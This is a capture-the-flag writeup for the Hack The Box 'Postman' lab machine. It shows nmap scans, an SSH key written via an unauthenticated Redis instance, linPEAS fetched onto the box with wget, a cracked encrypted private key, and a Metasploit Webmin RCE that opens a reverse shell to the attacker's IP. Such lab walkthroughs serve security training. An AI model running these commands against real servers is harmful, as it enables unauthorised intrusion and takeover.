oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 12:27:02 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/Easy/39.md

588 lines
23 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
search:
exclude: true
---
# Postman Writeup
![](img/39.png)
## Introduction :
Postman is an easy linux box released back in november 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
→ nmap -p- -T4 10.10.10.160
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 21:25 CEST
Nmap scan report for 10.10.10.160
Host is up (0.041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 26.48 seconds
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
→ nmap -sCV -p 22,80,6379,10000 10.10.10.160
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 21:26 CEST
Nmap scan report for 10.10.10.160
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.79 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up a Redis 4.0.x instance running on port 6379
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
→ searchsploit redis 4
------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation | windows/local/45244.txt
Redis - Replication Code Execution (Metasploit) | linux/remote/48272.rb
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit) | linux/remote/47195.rb
Redis 5.0 - Denial of Service | linux/dos/44908.txt
Redis-cli <****5.0 - Buffer Overflow (PoC) | linux/local/44904.py
------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
As you can see, there are a few exploits available for redis 4.0.x and one of them is an unauthenticated command execxution and filewrites. So let's test that with redis-cli:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
→ sudo apt install redis -y
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
→ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
10) ""
11) "logfile"
12) "/var/log/redis/redis-server.log"
13) "pidfile"
14) "/var/run/redis/redis-server.pid"
[...]
Here we see that the default folder for redis seems to be /var/lib/redis, so we're going to check if the redis user has SSH authentication configured by checking for a .ssh folder:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/idontexist/
(error) ERR Changing directory: No such file or directory
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh/
OK
So here we see that a .ssh folder does exist in redis' home directory, let's write our public SSH key to it:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
→ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/nothing/.ssh/id_ed25519):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/nothing/.ssh/id_ed25519
Your public key has been saved in /home/nothing/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:WUW671jwTAkg4RGKPvDZ4twbg6pWVynYTDS/HaTqbE0 nothing@nowhere
The key's randomart image is:
+--[ED25519 256]--+
| .o=o.. .o |
| . +ooo. o |
|. . * .o..+ |
| + + +.ooo.o . |
| * ..oES.o o |
| o *o.o * |
| = =+ . = |
| o .+ + |
|= . . . |
+----[SHA256]-----+
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
→ cat ~/.ssh/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
→ (echo -e "\n\n";cat ~/.ssh/id_ed25519.pub;echo -e "\n\n") > pubkey.txt
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
→ cat pubkey.txt
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
→ cat pubkey.txt| redis-cli -h 10.10.10.160 -x set ssh_key
OK
Here you can see we made sure that the public key had newline characters on either side, that is because if we didn't, redis would add our pubkey onto another, without jumping to a newline, obviously it wouldn't work, then we proceed:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
→ redis-cli -h 10.10.10.160
10.10.10.160:6379> get ssh_key
"\n\n\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere\n\n\n\n"
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> CONFIG SET dbfilename authorized_keys
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> exit
Once that's done, simply ssh as the redis user:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
→ ssh redis@10.10.10.160
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$
Now that we have a ssh access to the box as the redis user, we're going to enumerate the box, to do so we can use the old fashioned unix-privesc-check or we can use a newer solution called 'LinPEAS', i'm going to use it for the other boxes aswell, so i'll clone the repository in my ~/Tools directory:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/Tools]
→ git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
Cloning into 'privilege-escalation-awesome-scripts-suite'...
remote: Enumerating objects: 5452, done.
remote: Counting objects: 100% (239/239), done.
remote: Compressing objects: 100% (149/149), done.
remote: Total 5452 (delta 139), reused 132 (delta 85), pack-reused 5213
Receiving objects: 100% (5452/5452), 18.72 MiB | 3.94 MiB/s, done.
Resolving deltas: 100% (3250/3250), done.
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/Tools]
→ cd ~/HTB/Postman
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ sudo updatedb ; locate linpeas.sh
[sudo] password for nothing:
/home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ cp $(locate linpeas.sh) .
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ ls -lash linpeas.sh
336K -rwxr-xr-x 1 nothing nothing 334K May 25 08:52 linpeas.sh
Now let's transfer the file onto the box:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
Then download the script onto the box, you can either put it in **/tmp** or **/dev/shm** :
redis@Postman:~$ wget http://10.10.14.13:9090/linpeas.sh -O /dev/shm/peas.sh
--2021-05-25 08:03:20-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: /dev/shm/peas.sh
/dev/shm/peas.sh 100%[=================================================================================================================================================>] 333.85K 700KB/s in 0.5s
2021-05-25 08:03:20 (700 KB/s) - /dev/shm/peas.sh saved [341863/341863]
redis@Postman:~$ chmod +x /dev/shm/peas.sh
redis@Postman:~$ /dev/shm/peas.sh
` ![](prg/39_001.png)
linpeas.sh's output is quite massive so here's the important parts, if you're using tmux you can search for the output itself like this **CTRL+B PgUp, CTRL+S 'ssh files'** :
![](prg/39_002.png)
So Peas found an id_rsa.bak file in the **/opt** folder:
redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
As the title suggests, this is an encrypted private key file, so let's crack it with rockyou.txt using john:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
→ sudo gunzip rockyou.txt.gz
[sudo] password for nothing:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
→ ls -lash rockyou.txt
134M -rw-r--r-- 1 root root 134M Jul 17 2019 rockyou.txt
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
→ cd ~/HTB/Postman
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ vim pkey
Then we convert the private key to a hash with ssh2john.py and crack it with john:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ locate ssh2john.py
/usr/share/john/ssh2john.py
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ /usr/share/john/ssh2john.py pkey > hash
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ john hash --fork=4 -w=/usr/share/wordlists/rockyou.txt
Created directory: /home/nothing/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Node numbers 1-4 of 4 (fork)
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (pkey)
2 1g 0:00:00:05 DONE (2021-05-25 09:11) 0.1848g/s 662739p/s 662739c/s 662739C/sabygurl69
3 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 661514p/s 661514c/s 661514C/sa6_123
4 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 660302p/s 660302c/s 660302C/s *7¡Vamos!
1 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 660299p/s 660299c/s 660299C/sie168
Waiting for 3 children to terminate
Session completed
And we found the password computer2008. but the question is for which user is this for ? We can look at it from either /home or /etc/passwd:
redis@Postman:~$ ls -lash /home
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Sep 11 2019 .
4.0K drwxr-xr-x 22 root root 4.0K Sep 30 2020 ..
4.0K drwxr-xr-x 6 Matt Matt 4.0K Sep 11 2019 Matt
redis@Postman:~$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash
Here we see that the Matt user has a home directory, and a valid bash shell. So let's get to the user using sudo:
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
Matt@Postman:/var/lib/redis$ cd ~
Matt@Postman:~$ cat user.txt
23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the Matt user flag!
## **Part 3 : Getting Root Access**
Now we need to find a way to get root on this box, first instinct tells us to check sudo -l:
Matt@Postman:~$ sudo -l
[sudo] password for Matt:
Sorry, user Matt may not run sudo on Postman.
But that doesn't help us. Nor does anything else on this user, this is a bit of a rabbithole. Let's move onto the next thing our nmap scan picked up, the webmin service on port 10000
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ curl http://10.10.10.160:10000/
# Error - Document follows
This web server is running in SSL mode. Try the URL <https://Postman:10000/> instead.
So let's check it in https instead, we login as the Matt user with his password computer2008:
![](prg/39_003.png)
![](prg/39_004.png)
Matt@Postman:~$ cd /etc/webmin/
Matt@Postman:/etc/webmin$ cat version
1.910
So here's our hint, this is an outdated webmin version, so let's check what exploits we can use on it:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ searchsploit webmin 1.9
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
Webmin 1.900 - Remote Command Execution (Metasploit) | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execu | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (M | linux/webapps/49318.rb
Webmin <****1.290 / Usermin <****1.220 - Arbitrary File Dis | multiple/remote/1997.php
Webmin < ****1.290 / Usermin < ****1.220 - Arbitrary File Dis | multiple/remote/2017.pl
Webmin < ****1.920 - 'rpc.cgi' Remote Code Execution (Met | linux/webapps/47330.rb
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
So basically we can pick one of these, or we can make use of this proof of concept [here](https://github.com/KyleV98/Webmin-1.910-Exploit):
TLDR we can get a RCE using burpsuite because the package updater is vulnerable to command injections through the **u** POST parameter. If you click on **System** on the panel to the left, then click on **Software Package Updates** , you can turn on Burpsuite to intercept, and then just click **Update Selected Packages:** So let's use metasploit:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
→ msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.0.44-dev ]
+ -- --=[ 2131 exploits - 1139 auxiliary - 363 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: You can use help to view all
available commands
msf6 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
3 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
4 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
5 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
Interact with a module by name or index. For example info 5, use 5 or use exploit/linux/http/webmin_backdoor
msf6 > use 2
We're going to use the RCE module:
msf6 > use 2
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > show options
Module options (exploit/linux/http/webmin_packageup_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME yes Webmin Username
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin <= 1.910
We need to set the LHOST, RHOST, SSL, USERNAME and PASSWORD options before running the exploit:
msf6 exploit(linux/http/webmin_packageup_rce) > set LHOST tun0
LHOST => 10.10.14.13
msf6 exploit(linux/http/webmin_packageup_rce) > set RHOST 10.10.10.160
RHOST => 10.10.10.160
msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_packageup_rce) > run
[-] Exploit failed: One or more options failed to validate: USERNAME, PASSWORD.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
[+] Session cookie: 4cc0c13f51b9e777f7a9e0cdc9a93277
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.160:49564) at 2021-05-25 09:56:39 +0200
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
3aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get a root shell and print the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/39_graph.png)
Reference in a new issue View git blame Copy permalink